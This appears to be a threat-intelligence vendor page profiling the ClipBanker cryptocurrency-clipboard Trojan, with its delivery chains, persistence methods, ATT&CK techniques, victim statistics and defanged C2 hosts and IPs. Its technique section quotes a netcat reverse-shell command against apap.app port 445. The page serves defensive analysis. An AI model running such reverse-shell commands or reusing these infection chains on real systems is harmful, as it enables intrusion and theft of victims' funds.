ClipBanker
ClipBanker is a clipboard-hijacking cryptocurrency theft Trojan that monitors the victim’s clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses. Across the provided reporting, it is consistently described as targeting crypto assets and wallet formats spanning numerous blockchain networks, including Bitcoin, Ethereum, Solana, Monero, Dogecoin, TRON, Ripple, Litecoin and many others.
Observed delivery and execution chains include fake software downloads, trojanized installers, phishing and ClickFix-style lures, fake CAPTCHA/reCAPTCHA verification pages, MSHTA-driven infection chains, SourceForge-hosted fake Microsoft Office downloads, and a fake GitHub repository distributing a trojanized Proxifier installer. In one SourceForge campaign, AutoIt-based components injected a miner and ClipBanker, while additional tooling established persistence, Telegram-based telemetry exfiltration, and a reverse shell to apap[.]app:445. In another campaign, the final ClipBanker payload was injected into fontdrvhost.exe after a long fileless chain involving Defender exclusions, in-memory PowerShell, registry-stored scripts, scheduled tasks, and payload retrieval from Pastebin-like services and GitHub.
Persistence mechanisms directly mentioned include Windows registry Run keys, scheduled tasks, App Paths registry hijacking, services, Image File Execution Options debugger abuse, WMI event filters/consumers, and registry-stored PowerShell launched at logon. One Kaspersky compromise-assessment case identified a ClipBanker variant persisting via HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp on a user workstation. Bitdefender also reported a ClipBanker chain using a remote HTA from asd[.]s7610rir[.]pw/win/checking[.]hta, downloading checking.ps1 from 185[.]208[.]159[.]199 and additional payloads including ichigo-lite.ps1 and del.ps1 from 87[.]96[.]21[.]84, with scheduled task names masquerading as legitimate services such as Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237.
Implementation details in the content include C++/MinGW builds, AutoIt-based loaders/injectors, and variants that may avoid network communication entirely once deployed, focusing solely on clipboard monitoring and address substitution. ClipBanker also appears as a module within LummaC2/LummaStealer-related activity, where it performs wallet-address replacement. It is additionally referenced in campaigns associated with ViperSoftX operators, alongside QuasarRAT and PureRAT, for cryptocurrency wallet theft and remote control.
Victimology in the provided material centers on cryptocurrency users and financially motivated campaigns. Kaspersky’s 2024 financial threat reporting states ClipBanker accounted for 62.9% of users attacked by financial PC malware in 2024. Campaign telemetry cited in the content includes more than 2,000 encountered users in a trojanized Proxifier campaign, mainly in India and Vietnam, and 4,604 users exposed to the SourceForge fake Office campaign, with 90% of potential victims in Russia.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Execution
7 techniques
Execution
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
This essentially creates a remote command line with apap[.]app:445 as the C2 server.
the VB script runs a PowerShell interpreter to download and execute a batch file, confvk , from GitHub.
This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.
Persistence
6 techniques
Persistence
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost . exe -- ssl apap . app 445 - e cmd . exe
Privilege Escalation
6 techniques
Privilege Escalation
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost . exe -- ssl apap . app 445 - e cmd . exe
Stealth
10 techniques
Stealth
The HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.
Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes.
The downloaded archive contains another password-protected archive, installer.zip... Inside installer.zip is a file named installer.msi . This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer.
Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.
The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.
The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.
the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.
This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.
Defense Impairment
1 technique
Defense Impairment
Discovery
2 techniques
Discovery
Collection
2 techniques
Collection
Command and Control
3 techniques
Command and Control
One of the PowerShell scripts sends a message to a certain chat using the Telegram API.
the VB script runs a PowerShell interpreter to download and execute a batch file, confvk , from GitHub... The other PowerShell script downloads another batch file, confvz
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection.
IOCs tracked for this family
48 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Стилер, обнаруженный на рабочей станции пользователя; закреплялся через реестр Windows, добавлялся в исключения Защитника Windows и маскировался атрибутами hidden/system.
A data stealer variant observed persisting via a Windows Run registry key after adding its folder to Windows Defender exclusions and hiding the file with hidden/system attributes.
A malware family observed in MSHTA-enabled campaigns; the article provides IoCs but limited behavioral detail. Based on the name and context, it is discussed as a distinct payload/tool in these infection chains.
Clipboard-hijacking trojan that monitors copied cryptocurrency wallet addresses and replaces them with attacker-controlled addresses to steal funds across multiple blockchain networks.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.